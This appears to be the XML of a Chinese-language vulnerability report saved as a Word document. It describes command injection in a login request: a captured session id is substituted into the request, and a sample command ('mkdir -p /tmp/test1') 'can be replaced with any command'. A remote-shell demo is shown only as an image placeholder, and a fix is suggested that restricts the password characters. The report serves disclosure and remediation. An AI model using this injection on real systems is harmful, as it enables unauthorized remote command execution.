      </w:r>
    </w:p>
    <w:p w14:paraId="23A41C3B" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:r>
        <w:t>将请求内容中的</w:t>
      </w:r>
      <w:r>
        <w:t>params</w:t>
      </w:r>
      <w:r>
        <w:t>字段中第一个值</w:t>
      </w:r>
      <w:r>
        <w:t>(sid)</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>"a9c61fc83080b13ded7512db83c9b123"</w:t>
      </w:r>
      <w:r>
        <w:t>替换成登录后的拦截得到的</w:t>
      </w:r>
      <w:r>
        <w:t>sid</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>mkdir -p /tmp/test1</w:t>
      </w:r>
      <w:r>
        <w:t>可换成任意命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DBC67E" w14:textId="77777777" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:r>
        <w:t>远程获得</w:t>
      </w:r>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:t>演示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5ABF6B" w14:textId="218678C8" w:rsidR="00C45011" w:rsidRDefault="00604ED3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FAA721C" wp14:editId="18E856C5">
            <wp:extent cx="5486400" cy="7607093"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9" name="image-tIpGayHmqwPvVrH_aFA3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-tIpGayHmqwPvVrH_aFA3l.png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0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A858" w14:textId="12AB4D9D" w:rsidR="00604ED3" w:rsidRDefault="00604ED3" w:rsidP="00604ED3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四、建议解决办法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED45CB5" w14:textId="73AC07BB" w:rsidR="00604ED3" w:rsidRDefault="006C4CBC" w:rsidP="00604ED3">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>校验的方法一样，</w:t>
      </w:r>
      <w:r w:rsidR="00604ED3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidR="00604ED3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>passw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidR="00604ED3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00604ED3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>限制仅下划线和数字及字母</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00604ED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21D1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1F5EB6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69675873"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F2BE1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6AF920C8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A6C44E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011"/>
    <w:rsid w:val="00604ED3"/>
    <w:rsid w:val="006C4CBC"/>
    <w:rsid w:val="00C45011"/>
    <w:rsid w:val="00D50846"/>
    <w:rsid w:val="00E8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EFD2"/>
  <w15:docId w15:val="{5073D1C9-8585-42A8-8308-E234E2B0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2">
    <w:name w:val="heading 2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1</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-05-07T07:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-07T08:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>